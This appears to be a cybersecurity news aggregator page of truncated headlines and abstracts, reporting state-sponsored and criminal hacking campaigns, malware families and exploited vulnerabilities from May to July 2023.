Cybersecurity researchers have unearthed a novel rootkit signed by Microsoft that's engineered to communicate with an actor-controlled attack infrastructure. Trend Micro has attributed the activity cluster to the same actor that was previously identified as behind the FiveSys rootkit , which came to light in October 2021. "This malicious actor originates from China and their main victims are the gaming sector in China," Trend Micro's Mahmoud Zohdy, Sherif Magdy, and Mohamed Fahmy said . Their malware seems to have passed through the Windows Hardware Quality Labs ( WHQL ) process for getting a valid signature. Multiple variants of the rootkit spanning eight different clusters have been discovered, with 75 such drivers signed using Microsoft's WHQL program in 2022 and 2023. Trend Micro's analysis of some of the samples has revealed the presence of debug messages in the source code, indicating that the operation is still in the development and testing phasThe Hacker News
July 6, 2023
Crysis Threat Actors Use RDP Connections to Distribute Venus Ransomware Full Text
Abstract
ASEC recently discovered that Crysis ransomware attackers were scanning the internet, via brute force or dictionary attacks, for vulnerable RDP endpoints to install Venus ransomware on systems.Cyware
July 04, 2023
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors Full Text
Abstract
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users," cybersecurity company Sekoia said in a technical write-up. DDoSia is attributed to a pro-Russian hacker group called NoName(057)16 . Launched in 2022 and a successor of the Bobik botnet , the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan. Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different wThe Hacker News
July 03, 2023
Chinese Hackers Use HTML Smuggling to Infiltrate European Ministries with PlugX Full Text
Abstract
A Chinese nation-state group has been observed targeting Foreign Affairs ministries and embassies in Europe using HTML smuggling techniques to deliver the PlugX remote access trojan on compromised systems. Cybersecurity firm Check Point said the activity, dubbed SmugX , has been ongoing since at least December 2022. "The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors," Check Point said . "Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar." The exact identity of the threat actor behind the operation is a little hazy, although existing clues point in the direction of Mustang Panda , which also shares overlaps with clusters tracked as Earth Preta, RedDelta, and Check Point's own dThe Hacker News
June 30, 2023
Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks Full Text
Abstract
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiaoThe Hacker News
June 29, 2023
From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon Full Text
Abstract
The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom made, actively developed framework has been leveraged in the February 2023 attack on Technion , an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers . "It is structurally and functionally similar to MuddyC3 , a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyberThe Hacker News
June 29, 2023
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware Full Text
Abstract
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff ) and other subordinate elements collectively tracked under the umbrella name Lazarus Group . The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdThe Hacker News
June 29, 2023
Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor Full Text
Abstract
The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation.Cyware
June 27, 2023
The potent cyber adversary threatening to further inflame Iranian politics Full Text
Abstract
The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security.Cyware
June 26, 2023
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks Full Text
Abstract
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda . "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said . Volt Typhoon, as known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools againstThe Hacker News
June 22, 2023
Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware Full Text
Abstract
The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare instituThe Hacker News
June 22, 2023
Russian hacking group puts fresh emphasis on stealing credentials Full Text
Abstract
These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries.Cyware
June 21, 2023
ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks Full Text
Abstract
The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previous undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT , although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file --The Hacker News
June 21, 2023
Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor Full Text
Abstract
Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in an European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group thaThe Hacker News
June 19, 2023
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments Full Text
Abstract
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services ( IIS ) and Microsoft Exchange serves to infiltrate target networks. Palo Alto Networks said it deteThe Hacker News
June 16, 2023
New Diicot Threat Group Targets SSH Servers with Brute-Force Malware Full Text
Abstract
Deploying Cayosin botnet, an off-the-shelf Mirai-based botnet agent to target routers running the Linux-based OS OpenWRT is a newly adopted tactic, indicating that the group changes its attack style after examining its targets.Cyware
June 15, 2023
BreachForums Returns Under the Control of ShinyHunters Hackers Full Text
Abstract
The notorious hacking group ShinyHunters, who has been responsible for numerous massive data leaks in the past, has assumed control of the revived platform, raising alarm among cybersecurity experts and law enforcement agencies worldwide.Cyware
June 15, 2023
New Report Reveals Shuckworm’s Long-Running Intrusions on Ukrainian Organizations Full Text
Abstract
The Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments. Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec said in a new report shared with The Hacker News. "In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said. "The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more." Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to the Russia's FeThe Hacker News
June 15, 2023
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent Full Text
Abstract
Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate ( GRU ) and has a "relatively low success rate." The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586 , has graduated it to a named actor dubbed Cadet Blizzard . "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company said . "While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard ." Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel wThe Hacker News
June 14, 2023
Chinese Hackers Exploit VMware Zero-Day to Backdoor Windows and Linux Systems Full Text
Abstract
The Chinese state-sponsored group known as UNC3886 has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as CVE-2023-20867 (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs," Mandiant said . UNC3886 was initially documented by the Google-owned threat intelligence firm in September 2022 as a cyber espionage actor infecting VMware ESXi and vCenter servers with backdoors named VIRTUALPITA and VIRTUALPIE. Earlier this March, the group was linked to the exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system to deploy implants on the network appliances and interact with the aforementioned malware. The threat actor has been described as aThe Hacker News
June 05, 2023
Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App Full Text
Abstract
Microsoft has officially linked the ongoing active exploitation of a critical flaw in the Progress Software MOVEit Transfer application to a threat actor it tracks as Lace Tempest . "Exploitation is often followed by deployment of a web shell with data exfiltration capabilities," the Microsoft Threat Intelligence team said in a series of tweets today. "CVE-2023-34362 allows attackers to authenticate as any user." Lace Tempest, also called Storm-0950, is a ransomware affiliate that overlaps with other groups such as FIN11, TA505, and Evil Corp. It's also known to operate the Cl0p extortion site. The threat actor also has a track record of exploiting different zero-day flaws to siphon data and extort victims, with the group recently observed weaponizing a severe bug in PaperCut servers . CVE-2023-34362 relates to an SQL injection vulnerability in MOVEit Transfer that enables unauthenticated, remote attackers to gain access to the database and executeThe Hacker News
June 5, 2023
Update: Ransomware Group Used MOVEit Exploit to Steal Data From Dozens of Organizations Full Text
Abstract
Mandiant has attributed the attack to UNC4857, a new threat cluster, and named the delivered webshell LemurLoot. Microsoft, on the other hand, is confident that the threat actor behind the Cl0p ransomware is responsible for the attack.Cyware
June 5, 2023
The Hidden Menace of the Terminator Antivirus Killer Full Text
Abstract
A threat actor was discovered promoting a tool called Terminator that can reportedly bypass 24 antivirus, EDR, and XDR solutions. However, Crowdstrike found that it uses a Bring Your Own Vulnerable Driver (BYOVD) attack. Presently, the vulnerable driver used by Terminator is only being identified b ... Read MoreCyware
June 02, 2023
Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering Full Text
Abstract
The Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of "basic machine enumeration and command execution via PowerShell or Goroutines." What the malware lacks in terms of sophistication, it makes up for it when it comes to establishing redundant methods to retain access to the compromised host by means of multiple persistency tasks and varied methods to communicate with different servers. Camaro Dragon overlaps with a threat actor widely tracked as Mustang Panda, a state-sponsored group from China that is known to be active since at least 2012. The adversarial collective was recently in the spotlight for a custom bespoke firmware implant called Horse Shell that co-opts TP-Link routers into a mesh network capable of transmitting coThe Hacker News
June 01, 2023
N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT Full Text
Abstract
Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that's employed by the North Korean state-sponsored actor known as ScarCruft . "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially maintain persistent control over compromised systems," ThreatMon said . ScarCruft , active since at least 2012, is a cyber espionage group that operates on behalf of the North Korean government, exclusively focusing on targets in its southern counterpart. The group is believed to be a subordinate element within North Korea's Ministry of State Security (MSS). Attack chains mounted by the group have leaned heavily on social engineering to spear-phish victims and deliver payloads onto target networks. This includes exploiting vulnerabilities in Hancom's Hangul WordThe Hacker News
May 31, 2023
Threat actors are exploiting Barracuda Email Security Gateway bug since October 2022 Full Text
Abstract
Recently disclosed zero-day flaw in Barracusa Email Security Gateway (ESG) appliances had been actively exploited by attackers since October 2022. The network security solutions provider Barracuda recently warned customers that some of its Email Security...Security Affairs
May 31, 2023
Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months Full Text
Abstract
Enterprise security firm Barracuda on Tuesday disclosed that a recently patched zero-day flaw in its Email Security Gateway (ESG) appliances had been abused by threat actors since October 2022 to backdoor the devices. The latest findings show that the critical vulnerability , tracked as CVE-2023-2868 (CVSS score: N/A), has been actively exploited for at least seven months prior to its discovery. The flaw, which Barracuda identified on May 19, 2023, affects versions 5.1.3.001 through 9.2.0.006 and could allow a remote attacker to achieve code execution on susceptible installations. Patches were released by Barracuda on May 20 and May 21. "CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances," the network and email security company said in an updated advisory. "Malware was identified on a subset of appliances allowing for persistent backdoor access. Evidence of data exfiltration was identified on a subset of impacted applianceThe Hacker News
May 30, 2023
Hackers Win $105,000 for Reporting Critical Security Flaws in Sonos One Speakers Full Text
Abstract
Multiple security flaws uncovered in Sonos One wireless speakers could be potentially exploited to achieve information disclosure and remote code execution, the Zero Day Initiative (ZDI) said in a report published last week. The vulnerabilities were demonstrated by three different teams from Qrious Secure, STAR Labs, and DEVCORE at the Pwn2Own hacking contest held in Toronto late last year, netting them $105,000 in monetary rewards. The list of four flaws, which impact Sonos One Speaker 70.3-35220, is below - CVE-2023-27352 and CVE-2023-27355 (CVSS scores: 8.8) - Unauthenticated flaws that allow network-adjacent attackers to execute arbitrary code on affected installations. CVE-2023-27353 and CVE-2023-27354 (CVSS score: 6.5) - Unauthenticated flaws that allow network-adjacent attackers to disclose sensitive information on affected installations. While CVE-2023-27352 stems from when processing SMB directory query commands, CVE-2023-27355 exists within the MPEG-TS parsThe Hacker News
May 29, 2023
Tortoiseshell Eyes Israeli Logistics Industry Full Text
Abstract
Alleged Iranian nation-state hacker group Tortoiseshell performed a watering hole attack on several shipping and logistics websites in Israel to collect information about their users. Attackers stay hidden by impersonating the genuine jQuery JavaScript framework. Organizations are urged to raise aw ... Read MoreCyware
May 25, 2023
Brazilian hackers target Portuguese financial institutions Full Text
Abstract
A Brazilian hacking crew targeted users of over 30 Portuguese financial institutions earlier this year in a campaign that provides the latest example of financially motivated hackers in Brazil hitting foreign targets, according to SentinelLabs.Cyware
May 25, 2023
Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware Full Text
Abstract
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations. Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections. Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater . It's known to be active since at least December 2020. In December 2022, the hacking crew was attributed to a set of attempted disruptive intrusions that were directed against diamond industries in South Africa, Israel, and Hong Kong. These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++. "The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilThe Hacker News
May 24, 2023
N. Korean Lazarus Group Targets Microsoft IIS Servers to Deploy Espionage Malware Full Text
Abstract
The infamous Lazarus Group actor has been targeting vulnerable versions of Microsoft Internet Information Services ( IIS ) servers as an initial breach route to deploy malware on targeted systems. The findings come from the AhnLab Security Emergency response Center (ASEC), which detailed the advanced persistent threat's (APT) continued abuse of DLL side-loading techniques to run arbitrary payloads. "The threat actor places a malicious DLL (msvcr100.dll) in the same folder path as a normal application (Wordconv.exe) via the Windows IIS web server process, w3wp.exe," ASEC explained . "They then execute the normal application to initiate the execution of the malicious DLL." DLL side-loading , similar to DLL search-order hijacking, refers to the proxy execution of a rogue DLL via a benign binary planted in the same directory. Lazarus , a highly-capable and relentless nation-state group linked to North Korea, was most recently spotted leveraging the same tThe Hacker News
May 22, 2023
Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade Full Text
Abstract
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought. The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016. "While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week. The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone, log keystrokes, grab passwords, and harvest Gmail inboxes. Bad Magic was first documented by the company in March 2023, detailThe Hacker News
May 20, 2023
UNC3944 Threat Group Uses Azure Built-in Tools to Abuse Azure VMs Full Text
Abstract
Financially-motivated UNC3944 gang was found using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines to steal data from victim organizations. The threat actor gains initial access to an Azure administrator's account by using stolen creden ... Read MoreCyware
May 18, 2023
Russian Hackers Target Ukrainians’ Personal Data, Says Kyiv Full Text
Abstract
Ukraine's top cybersecurity agency says Russian hackers took a sudden interest in obtaining personal data and mounted successful attacks against more than one-third of the country's largest insurers.Cyware
May 17, 2023
ESXi Servers Face New Threats From MichaelKors RaaS Affiliates Full Text
Abstract
Group-IB infiltrated the infrastructure of MichaelKors RaaS to divulge never-before-heard secrets of its affiliate nexus, which would often target critical sector entities. For instance, affiliates take back 80-85% of the ransomware payments. The common attack tactics used by MichaelKors include ph ... Read MoreCyware
May 17, 2023
OilAlpha: Emerging Houthi-linked Cyber Threat Targets Arabian Android Users Full Text
Abstract
A hacking group dubbed OilAlpha with suspected ties to Yemen's Houthi movement has been linked to a cyber espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula. "OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets," cybersecurity company Recorded Future said in a technical report published Tuesday. "It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices." OilAlpha is the new cryptonym given by Recorded Future to two overlapping clusters previously tracked by the company under the names TAG-41 and TAG-62 since April 2022. TAG-XX (short for Threat Activity Group) is the temporary moniker assigned to emerging threat groups. The assessment that the adversary is acting in the interest of the Houthi movement is baseThe Hacker News
May 17, 2023
Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover Full Text
Abstract
A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments. Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944 , which is also known as Roasted 0ktapus and Scattered Spider. "This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said . The emerging adversary, which first came to light late last year, is known to leverage SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022. Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associatedThe Hacker News
May 17, 2023
State-Sponsored Sidewinder Hacker Group’s Covert Attack Infrastructure Uncovered Full Text
Abstract
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China. This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News. "The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said . SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments. The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the PhilippiThe Hacker News
May 16, 2023
Hackers use Azure Serial Console for stealthy access to VMs Full Text
Abstract
A financially motivated cybergang tracked by Mandiant as 'UNC3944' is using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines.BleepingComputer
May 16, 2023
Hackers infect TP-Link router firmware to attack EU entities Full Text
Abstract
A Chinese state-sponsored hacking group named "Camaro Dragon" infects residential TP-Link routers with a custom "Horse Shell" malware used to attack European foreign affairs organizations.BleepingComputer
May 16, 2023
Pro-Houthi hacking group linked to spyware operation on Arabian Peninsula Full Text
Abstract
From April to May 2022, as Saudi Arabia hosted negotiations between Yemeni leaders involved in the nearly decade-long civil war, OilAlpha sent malicious Android files through WhatsApp to political representatives and journalists, researchers noted.Cyware
May 16, 2023
China’s Mustang Panda Hackers Exploit TP-Link Routers for Persistent Attacks Full Text
Abstract
The Chinese nation-state actor known as Mustang Panda has been linked to a new set of sophisticated and targeted attacks aimed at European foreign affairs entities since January 2023. An analysis of these intrusions, per Check Point researchers Itay Cohen and Radoslaw Madej, has revealed a custom firmware implant designed explicitly for TP-Link routers. "The implant features several malicious components, including a custom backdoor named 'Horse Shell' that enables the attackers to maintain persistent access, build anonymous infrastructure, and enable lateral movement into compromised networks," the company said . "Due to its firmware-agnostic design, the implant's components can be integrated into various firmware by different vendors." The Israeli cybersecurity firm is tracking the threat group under the name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich. The exact method usedThe Hacker News
May 16, 2023
Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems Full Text
Abstract
A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems. That's according to findings from SentinelOne, which observed an increase in the number of Geacon payloads appearing on VirusTotal in recent months. "While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks," security researchers Phil Stokes and Dinesh Devadoss said in a report. Cobalt Strike is a well-known red teaming and adversary simulation tool developed by Fortra. Owing to its myriad capabilities, illegally cracked versions of the software have been abused by threat actors over the years. While post-exploitation activity associated with Cobalt Strike has primarily singled out Windows, such attacks against macOS are something of a rarity. In May 2022, software supply chain firm Sonatype disclosed details of a rogue Python package called " pymafka "The Hacker News
May 10, 2023
DownEx cyberespionage operation targets Central Asia Full Text
Abstract
A new sophisticated malware strain, dubbed DownEx, was involved in attacks aimed at Government organizations in Central Asia. In late 2022, Bitdefender Labs researchers first observed a highly targeted cyberattack targeting foreign government...Security Affairs
May 09, 2023
Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps Full Text
Abstract
A gambling company in the Philippines was the target of a China-aligned threat actor as part of a campaign that has been ongoing since October 2021. Slovak cybersecurity firm ESET is tracking the series of attacks against Southeast Asian gambling companies under the name Operation ChattyGoblin . "These attacks use a specific tactic: targeting the victim companies' support agents via chat applications – in particular, the Comm100 and LiveHelp100 apps," ESET said in a report shared with The Hacker News. The use of a trojanized Comm100 installer to deliver malware was first documented by CrowdStrike in October 2022. The company attributed the supply chain compromise to a threat actor likely with associations to China. The attack chains leverage the aforementioned chat apps to distribute a C# dropper that, in turn, deploys another C# executable, which ultimately serves as a conduit to drop a Cobalt Strike beacon on hacked workstations. Also highlighted in ESET'The Hacker News
May 08, 2023
SideCopy Using Action RAT and AllaKore RAT to infiltrate Indian Organizations Full Text
Abstract
The suspected Pakistan-aligned threat actor known as SideCopy has been observed leveraging themes related to the Indian military research organization as part of an ongoing phishing campaign. This involves using a ZIP archive lure pertaining to India's Defence Research and Development Organization ( DRDO ) to deliver a malicious payload capable of harvesting sensitive information, Fortinet FortiGuard Labs said in a new report. The cyber espionage group, with activity dating back to at least 2019, targets entities that align with Pakistan government interests. It's believed to share overlaps with another Pakistani hacking crew called Transparent Tribe . SideCopy's use of DRDO-related decoys for malware distribution was previously flagged by Cyble and Chinese cybersecurity firm QiAnXin in March 2023, and again by Team Cymru last month. Interestingly, the same attack chains have been observed to load and execute Action RAT as well as an open source remote acThe Hacker News
May 6, 2023
Kimsuky Enhances its BabyShark Recon Tool in a Global Campaign Full Text
Abstract
North Korean hacking group Kimsuky is distributing a new version of its reconnaissance malware called ReconShark. The cyberespionage campaign involves sending emails containing a link to a password-protected doc hosted on Microsoft OneDrive. The malware can steal sensitive data from the infected sy ... Read MoreCyware
May 6, 2023
Russian actor Uses WinRAR and DD Command to Destroy Ukrainian Data Full Text
Abstract
CERT-UA confirmed the discovery of a malicious script dubbed RoarBat that is most probably being used by the Russian threat group Sandworm to wipe off data from Ukrainian state networks. The script uses the WinRaR application for archiving and compressing applications and then deleting specific fil ... Read MoreCyware
May 6, 2023
Meta Cracks Down on South Asian Cyberespionage Groups Full Text
Abstract
Social media giant Meta took down hundreds of fake Facebook and Instagram accounts used by South Asia advanced persistent threat groups to glean sensitive information and coax users into installing malware.Cyware
May 05, 2023
Hackers Targeting Italian Corporate Banking Clients with New Web-Inject Toolkit DrIBAN Full Text
Abstract
Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019. "The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account," Cleafy researchers Federico Valentini and Alessandro Strino said . The bank accounts, per the Italian cybersecurity firm, are either controlled by the threat actors themselves or their affiliates, who are then tasked with laundering the stolen funds. The use of web injects is a time-tested tactic that makes it possible for malware to inject custom scripts on the client side by means of a man-in-the-browser ( MitB ) attack and intercept traffic to and from the server. The fraudulent transactions are often realized by means of a technique callThe Hacker News
May 05, 2023
N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks Full Text
Abstract
The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign. "[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said . Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima. Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe. The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferatThe Hacker News
May 04, 2023
Kimsuky hackers use new recon tool to find security gaps Full Text
Abstract
The North Korean Kimsuky hacking group has been observed employing a new version of its reconnaissance malware, now called 'ReconShark,' in a cyberespionage campaign with a global reach.BleepingComputer
May 4, 2023
Iranian Surveillance Operations Use BouldSpy to Track Minority Groups Full Text
Abstract
The law enforcement command of the Islamic Republic of Iran (FARAJA) is allegedly physically deploying a malware strain known as BouldSpy on the devices of a section of people. As per reports, it is in use since at least 2020 and has claimed more than 300 victims to date. The malware serves the pur ... Read MoreCyware
